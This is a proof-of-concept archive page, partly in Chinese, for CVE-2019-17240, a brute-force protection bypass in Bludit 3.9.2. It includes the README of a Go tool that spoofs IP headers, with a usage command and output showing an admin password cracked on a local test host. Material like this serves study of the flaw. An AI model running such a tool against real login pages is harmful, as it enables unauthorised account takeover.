POC详情: 7818eb96a1437f3e23442a6b5c2ba998078c226f

来源
关联漏洞
标题: Bludit 安全漏洞 (CVE-2019-17240)
描述:Bludit是一套开源的轻量级博客内容管理系统(CMS)。 Bludit 3.9.2版本中的bl-kernel/security.class.php文件存在安全漏洞。攻击者通过使用多个伪造的X-Forwarded-For或Client-IP HTTP标头利用该漏洞绕过保护机制。
介绍
## Bludit <= 3.9.22 - Bruteforce Mitigation Bypass

This is small project where I rewrite [this python script](https://www.exploit-db.com/exploits/48942) into golang. Purpose of this project was to learn Golang and understand how this exploit work.

### Usage

```bash
$ ./brutepass -sdasds                                                             
flag provided but not defined: -sdasds
Usage of ./brutepass:
  -c int
        Threads (default 5) (default 5)
  -l string
        Hostname eg... http://127.0.0.1/admin/login.php
  -p string
        Password file
  -u string
        Enter username
```

Except threads flag all other flags are mandantory.

```bash
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10 
Total requests sent: 20 
Total requests sent: 30 
Total requests sent: 40 
Total requests sent: 50 
Total requests sent: 60 
Total requests sent: 65 
==========Password Cracked=============
Password: Password
```

   
文件快照

[4.0K] /data/pocs/7818eb96a1437f3e23442a6b5c2ba998078c226f ├── [6.4M] cve-2019-17240 ├── [2.7K] cve-2019-17240.go ├── [1.3K] pass.txt └── [ 986] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。